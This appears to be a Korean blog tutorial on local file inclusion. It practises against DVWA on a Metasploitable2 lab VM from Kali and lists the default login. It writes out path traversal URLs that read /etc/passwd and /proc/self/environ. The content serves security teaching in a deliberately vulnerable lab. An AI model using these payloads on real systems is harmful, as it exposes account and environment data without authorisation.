LFI 란 ?
웹 브라우저의 URL을 이용해 공격 대상 서버에 파일을 포함시키는 과정의 공격입니다
실습을 하기 위해 칼리(kali)와 메타스플로잇터블(metasploitable2)을 실행시켜줍니다
Kali
firefox http://meta & ( 메타스플로잇터블 아이피를 입력하셔도 됨 )
http://meta/index.php
인터넷 창이 열리면 DVWA 를 눌러 접속해 줍니다
로그인 페이지
ID : admin
PW : password
보안레벨 낮추기
보안 레벨을 낮춰 웹페이지를 취약하게(LFI 취약점이 있는 코드) 만들어 연습을 해보겠습니다
File Inclusion
주소창에 일부러 오류를 내어 서버내에 있는 include.php파일의 경로를 확인할 수 있으며,
View Source 를 통해 웹페이지의 보안이 어떤식으로 짜여져 있는지 확인 할 수 있습니다
http://meta/dvwa/vulnerabilities/fi/?page=include.phphi
/var/www/dvwa/vulnerabilities/fi/index.php
위의 위치는 해당 서버 index.php 의 경로를 최상위 경로부터 절대경로로 나타낸 것 입니다
여기서 문자들을 상위로 이동하는 명령어인 .. 을 붙여 최상위인 루트로 이동 후
/etc/passwd 사용자 계정정보에 접속해보겠습니다
http://meta/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
http://meta/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ
프로세스에 영향을 미치는 환경 변수들의 이름과 값을 확인할 수 있습니다
proxy를 사용하여 주소를 탈취하여 수정해보기
'Web보안' 카테고리의 다른 글
| LFI 취약점을 통한 공격실습(proxy) (1) | 2019.04.05 |
|---|---|
| dirb 웹퍼징 및 mutillidae 데이터베이스 변경 (0) | 2019.04.05 |
| Maltego 사용법 (0) | 2019.04.04 |
| 여러 방법으로 서브도메인 알아보기 (0) | 2019.03.30 |
| kali vmtools download (0) | 2019.03.29 |